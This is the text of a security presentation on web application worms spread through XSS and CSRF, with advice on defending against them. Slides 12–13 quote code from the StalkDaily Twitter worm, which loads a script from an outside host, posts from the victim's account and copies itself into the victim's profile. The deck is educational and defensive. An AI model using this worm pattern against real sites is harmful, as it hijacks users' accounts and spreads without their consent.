Web application vulnerabilities are dangerous. Hackers can target the web application directly (e.g. via SQL injection) or target the web application's users (e.g. via XSS). In recent years a new type of attack has emerged in which an infected, innocent user goes on to infect other users (AKA web application worms). Such attacks usually show exponential growth and cause massive damage. In this presentation we discuss how to develop a web application worm and, most importantly, how to protect your website from web application worms.
2. Agenda
• Computer Worms
• Why Hackers Develop Web Application Worms
• Web Application Worms
• Introduction to XSS
• StalkDaily Worm on Twitter - XSS Worm
• Introduction to CSRF
• WTF Worm on Twitter - CSRF Worm
• Potential Business Impact
• XSS & CSRF Defenses for
  • Users
  • Web Developers
  • Security Professionals
• Questions
@mostafasiraj
3. DISCLAIMER
– Hacking websites is ILLEGAL
– This presentation is meant for educational purposes ONLY
– Only use this stuff on YOUR website and YOUR account
4. Computer Worm
A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it.
(1) According to Wikipedia
5. Why Hackers Develop Web Application Worms
• Easier to develop
• Cross platform (Windows, Linux, OSX and Android), since execution occurs in the web browser
• Don't rely on browser, application or OS vulnerabilities
• Can propagate faster and cleaner than even the most notorious worms
• 1.01 billion active users on Facebook (2) according to yahoo finance
• 170 million active users on Twitter (3) according to techcrunch
6. Percentage likelihood that at least one serious vulnerability will appear in a website
(4) According to whitehat security website statistics report, Summer 2012
7. Web Application Worms
An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagates among visitors of a website in an attempt to progressively infect other visitors.
(5) According to Wikipedia with modification
You'll see how to create a worm using only a CSRF vulnerability, without XSS.
12. StalkDaily Worm
The profile URL field allowed JavaScript (the script on the next slide writes to user[url]):
<script src="hxxp://mikeyylolz.uuuq.com/x.js" />
13. StalkDaily Script
(6) source from dcortesi.com
// Excerpt from the worm's x.js. urlencode(), XHConn() and authtoken are
// defined earlier in the full script; authtoken is the page's own
// authenticity_token, readable because the script runs inside the victim's
// browser on twitter.com, so Twitter's CSRF token does not stop it.
update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");
xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
// 1) post the spam tweet from the victim's account
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token=" + authtoken + "&status=" + update + "&tab=home&update=update");
// 2) store the payload in the victim's profile URL field, so everyone who
//    views the victim's profile loads x.js and becomes the next carrier
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token=" + authtoken + "&user[url]=" + xss + "&tab=home&update=update");
18. WTF Worm
Updating the status on Twitter wasn't protected from CSRF.
By visiting the hacker's site, your Twitter account automatically posted two tweets.
21. XSS and CSRF on Facebook
Searches were done on Google
22. Potential Business Impact of Web Application Worms
• The snowball effect (Samy versus Code Red)
• Web browser botnets (DDoS)
• Think about a worm targeting eBay or Amazon (purchases, reviews, etc.)
• Stealing users' credentials (MySpace worm in 2006) (10) According to computerworld.com
• What could happen if AdSense or Facebook Connect was compromised with a web application worm
• "High Roller" malware targeting cloud based banking (estimated losses 75M-2.5B) (11) According to redmondmag.com
24. Defenses for Users
• Exercise caution when clicking on links sent by email, instant message or through social networks
• Use ScriptNo on Chrome and NoScript on Firefox (use IE at your own risk)
• Avoid questionable websites and cracked software
• Stay informed about security incidents
25. Defenses for Web Developers
XSS
– Input validation: accept only known good
– Output encoding for the context the data lands in (ESAPI)
– Set the session cookie to HttpOnly
– Specify the output character encoding (UTF-8, ASCII, etc.)
– Do not use blacklist validation
– Don't encode/decode more than once
– (8) XSS Prevention Cheat Sheet on OWASP
CSRF
– Use CSRFGuard from OWASP
– Do not use the GET method for any request that triggers a state change
– Identify especially dangerous operations and send a separate confirmation request to ensure that the user intended to perform that operation
– Ensure that there are no XSS vulnerabilities in your application: a script running in your origin can read the CSRF token, which is exactly what the StalkDaily script did with authenticity_token
– (9) CSRF Prevention Cheat Sheet on OWASP
26. Security Professionals
• Remember: "The natural way of writing code is insecure"
• Developers must take application security training
• Secure the whole SDLC
• Assessments and penetration tests
• White box and black box testing
• Start considering a WAF